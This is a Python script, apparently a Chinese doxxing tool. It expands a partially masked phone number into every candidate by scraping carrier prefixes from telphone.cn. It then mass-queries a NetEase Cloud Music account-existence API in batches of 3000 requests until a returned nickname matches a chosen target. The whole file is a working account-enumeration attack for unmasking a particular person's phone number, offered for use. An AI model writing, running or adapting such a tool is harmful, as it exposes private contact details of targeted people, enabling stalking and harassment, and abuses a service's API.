import asyncio
import aiohttp
import requests
import re
import random
import time
import sys

import subprocess

required_libraries = ['asyncio', 'aiohttp', 'requests', 're', 'random', 'time']

def install_library(library):
    subprocess.check_call([sys.executable, "-m", "pip", "install", library])
def check_and_install_libraries():
    for lib in required_libraries:
        try:
            __import__(lib)
            print(f"{lib} 已安装")
        except ImportError:
            print(f"{lib} 未安装，正在安装...")
            install_library(lib)
            print(f"{lib} 安装完成")
if __name__ == "__main__":
    check_and_install_libraries()
    print("所有依赖库已准备就绪！")

def GET_QQW(region, prefix):
    number_sg = f"{region}{prefix}"
    url = f"https://telphone.cn/prefix/{number_sg}/"
    response = requests.get(url)
    if response.status_code != 200:
        return
    html_content = response.text
    pattern = re.compile(r'<a href="/prefix/(\d{7})/">([\d]+)号段')
    matches = pattern.findall(html_content)
    numSG_list = [match[1] for match in matches]
    return numSG_list


def QQW(pattern, numSG_list):
    regex_pattern = pattern.replace('x', '\\d')
    return [num for num in numSG_list if re.fullmatch(regex_pattern, num)]


def HSW(pattern):
    suffixes = [f'{i:04d}' for i in range(10000)]
    regex_pattern = pattern.replace('x', '\\d')
    return [suffix for suffix in suffixes if re.fullmatch(regex_pattern, suffix)]


def generate_phone_numbers():
    print("小颖出品@fhjd888888")
    phonex = input("输入模糊手机号：")
    region = input("输入地区：")
    target_nickname = input("请输入要查询的昵称：")
    numSG_list = GET_QQW(region, phonex[:3])
    numSG_input = phonex[:7]
    matched_numSG = QQW(numSG_input, numSG_list)
    suffix_input = phonex[7:]
    matched_suffixes = HSW(suffix_input)

    with open('手机号.txt', 'w') as f:
        for qqw in matched_numSG:
            for hsw in matched_suffixes:
                f.write(qqw + hsw + "\n")

    print('手机号保存成功')
    return target_nickname


async def check_phone_existence(session, phone_number):
    """
    查询手机号是否在网易云音乐上存在。
    :param session: aiohttp.ClientSession 对象
    :param phone_number: 要查询的手机号
    :return: 查询结果
    """
    url = f"https://interface3.music.163.com/api/w/cellphone/existence/check?cellphone={phone_number}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36"
    }

    try:
        async with session.get(url, headers=headers) as response:
            response.raise_for_status()
            data = await response.json()

            if data.get("code") == 200 and data.get("exist") == 1:
                nickname = data.get('nickname')
                result = f"手机号 {phone_number} 的昵称是：{nickname}"
                return result
            else:
                return None
    except aiohttp.ClientError:
        return None
    except Exception:
        return None


async def batch_check_phone_numbers(phone_numbers, target_nickname):
    success_result = ""
    total_numbers = len(phone_numbers)
    async with aiohttp.ClientSession() as session:
        for i in range(0, total_numbers, 3000):
            batch = phone_numbers[i:i + 3000]
            tasks = [check_phone_existence(session, phone) for phone in batch]
            results = await asyncio.gather(*tasks)
            for result in results:
                if result:
                    nickname_in_result = result.split('：')[-1]
                    if (
                        len(target_nickname) > 0
                        and len(nickname_in_result) > 0
                        and target_nickname[0].lower() == nickname_in_result[0].lower()
                        and target_nickname[-1].lower() == nickname_in_result[-1].lower()
                    ):
                        end_time = time.time()
                        elapsed_time = end_time - start_time

                        phone_number = result.split()[1]
                        nickname = nickname_in_result
                        success_result = f"手机号: {phone_number}, 昵称: {nickname}"

                        print(f"\n{success_result} [成功匹配到目标昵称]，耗时: {elapsed_time} 秒，共查询了 {i + len(batch)} 个手机号")
                        print("查询成功，已找到匹配的结果，停止查询。")
                        with open("结果.txt", 'a', encoding='utf-8') as result_file:
                            result_file.write(success_result + "\n")
                        return

            completed_tasks = i + len(batch)
            progress = int((completed_tasks / total_numbers) * 100)
            sys.stdout.write(f'\r进度: [{progress}%] {"=" * (progress // 2)}{" " * (50 - progress // 2)}')
            sys.stdout.flush()

    end_time = time.time()
    elapsed_time = end_time - start_time
    if not success_result:
        print(f"\n查询为空，没有找到匹配的结果，耗时: {elapsed_time} 秒，最终查询了 {total_numbers} 个手机号。")
    else:
        print(f"\n查询结束，耗时: {elapsed_time} 秒，最终查询了 {total_numbers} 个手机号。")


if __name__ == "__main__":
    target_nickname = generate_phone_numbers()
    file_path = "手机号.txt"
    print("小颖出品@fhjd888888")
    print("开始查询网易云")

    try:
        phone_numbers = []
        with open(file_path, 'r', encoding='utf-8') as file:
            for line in file:
                phone_number = line.strip()
                phone_numbers.append(phone_number)

        start_time = time.time()
        asyncio.run(batch_check_phone_numbers(phone_numbers, target_nickname))

    except FileNotFoundError:
        print(f"文件 {file_path} 不存在。")
    except Exception as e:
        print(f"执行过程中出现其他异常: {e}")
